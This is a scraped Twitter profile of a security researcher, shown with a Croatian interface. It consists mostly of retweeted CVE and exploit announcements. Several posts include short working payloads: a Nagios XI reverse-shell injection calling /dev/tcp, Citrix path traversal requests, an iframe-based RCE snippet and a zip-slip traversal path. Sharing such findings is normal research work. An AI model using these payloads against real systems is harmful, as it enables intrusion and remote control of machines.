C0de3

@c0de3_

Hack Windows&Linux .HITB POC Speaker. Kernel exploit. Pentest amateur.Pwn2own 2017

Vrijeme pridruživanja: studeni 2014.

Tweetovi

Blokirali ste korisnika/cu @c0de3_

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @c0de3_

  1. proslijedio/la je Tweet
    19. sij

    CVE-2020-0674: Microsoft Internet Explorer 0day - Scripting Engine Memory Corruption Vulnerability being exploited in the wild

    Poništi
  2. proslijedio/la je Tweet
    13. sij

    A customized SharpLocker / fake login screen fools even the best sysadmin - did you lock your screen when you went for coffee ? ( )

    Poništi
  3. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet

    We're excited to announce Vancouver 2020 with new categories and returning partners, & along with sponsor . More than $1,000,000 USD available - plus a Model 3! Details at

    Poništi
  5. proslijedio/la je Tweet
    9. sij

    Introducing Security Defaults - secure default settings that we manage on organization's behalf to keep customers safe until they are ready to manage their own identity security story.

    Poništi
  6. proslijedio/la je Tweet
    9. sij

    Project Zero blog: "Remote‌ ‌iPhone‌ ‌Exploitation‌ ‌Part‌ ‌1:‌ ‌Poking‌ ‌Memory‌ ‌via‌ ‌iMessage‌ ‌and‌ ‌CVE-2019-8641‌" by Samuel Groß () --

    Poništi
  7. proslijedio/la je Tweet
    8. sij

    CVE-2019-20197 Nagios XI - RCE <= v5.6.9 /nagiosxi//includes/components/scheduledreporting/schedulereport.php Post : id=a";/bin/bash -l > /dev/tcp/x.x.x.x/8989 0<&1 2>&1;

    Poništi
  8. proslijedio/la je Tweet
    7. sij

    Full analysis and exploit for Windows kernel ws2ifsl use-after-free (CVE-2019-1215) by our researcher

    Poništi
  9. 31. pro 2019.

    CVE-2017-11176: A step-by-step Linux Kernel exploitation (part 4/4)

    Poništi
  10. proslijedio/la je Tweet
    24. pro 2019.

    -2019-17571 Apache Log4j 1.2.x RCE via Socket Server Deserialization

    Poništi
  11. proslijedio/la je Tweet

    [CPR-Zero] CVE-2019-1164 (Windows 10 Kernel): Out-Of-Bounds Read\Write in the StrechBlt function in win32kfull.sys

    Poništi
  12. proslijedio/la je Tweet
    31. srp 2019.
    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    30. srp 2019.

    [PoC Library] Windows RCE Exploits (1) Web VBScript - CVE-2018-8174 (tested on non updated Internet Explorer 11 Windows 7 64/32) - CVE-2019-0752 (tested on non updated Internet Explorer 11 Windows 7-10 (a bit slow on win10))

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    29. srp 2019.
    Poništi
  15. proslijedio/la je Tweet
    2. srp 2019.

    [PoC] Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution Exploit CVE-2019-0232 [PoC] Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit CVE-2019-12181

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    30. svi 2019.

    netstat 源代码调试 & 原理分析 Netstat source code debugging & analysis

    Poništi
  17. proslijedio/la je Tweet
    30. svi 2019.
    Poništi
  18. proslijedio/la je Tweet
    30. svi 2019.

    1-click RCE with Skype Web Plugin and Qt apps <iframe src='calculator://' height="0" frameborder="0"></iframe> <iframe src='calculator://' height="0" frameborder="0"></iframe>

    Poništi
  19. proslijedio/la je Tweet
    30. svi 2019.

    The Hidden Flaws of Archives in Java CVE-2019-3397, CVE-2019-12309 /my/target/directory/ ../../../../../../../../../[WEBROOT_PATH]/zipslip.jsp

    Poništi
  20. proslijedio/la je Tweet
    28. svi 2019.

    According to you, which layer is most vulnerable??

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·